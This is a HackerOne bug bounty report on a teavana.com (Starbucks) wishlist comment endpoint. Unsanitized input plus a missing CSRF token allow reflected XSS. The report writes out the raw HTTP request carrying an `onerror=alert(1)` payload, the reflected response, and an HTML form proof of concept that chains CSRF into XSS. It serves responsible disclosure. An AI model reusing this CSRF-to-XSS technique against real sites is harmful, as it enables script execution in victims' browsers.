Starbucks: Reflected XSS by exploiting CSRF vulnerability on teavana.com wishlist comment module. (wishlist-comments)

2016-10-22T10:40:41
ID H1:177508
Type hackerone
Reporter faisalahmed
Modified 2017-02-13T22:48:34

Description

User can add comments on their wishlist item. The http request which adds comment on wishlist item, looks like:

```http POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1 Host: www.teavana.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://www.teavana.com/us/en/my-wishlist Content-Length: 55 Cookie: REDACTED Connection: close

wishlistComment=:comment_string `` The value of thewishlistComment` reflects on the returned HTML snippet as bellow:

html <textarea maxlength="150" onkeyup="return ismaxlength(this);" id="wishlistComment" name="wishlistComment" cols="60" rows="12"> :comment_string </textarea>

But the returned string is not sanitized. As a result if user submits html/javascript payload as the value, that payload will return and will cause javascript execution.

vulnerable post ```http POST /on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id HTTP/1.1 Host: www.teavana.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://www.teavana.com/us/en/my-wishlist Content-Length: 55 Cookie: REDACTED Connection: close

wishlistComment=</textarea><img+src=x+onerror=alert(1)> **Response**html <textarea maxlength="150" onkeyup="return ismaxlength(this);" id="wishlistComment" name="wishlistComment" cols="60" rows="12"> </textarea><img src=x onerror=alert(1)> </textarea> ```

There is no csrf token tied with the comment adding post request. As a result this csrf flaw can make the self-xss as a global reflected xss.

CSRF to XSS PoC

html &lt;html&gt; &lt;body&gt; &lt;form action="https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Wishlist-Comments/:id" method="POST"&gt; &lt;input type="hidden" name="wishlistComment" value="&lt;&#47;textarea&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;&gt;" /&gt; &lt;input type="submit" value="Submit request" /&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt;

Replace the :id with your wishlist id (ex: C1005285074). This will execute the javascript and will popup an alert box.

{F129593}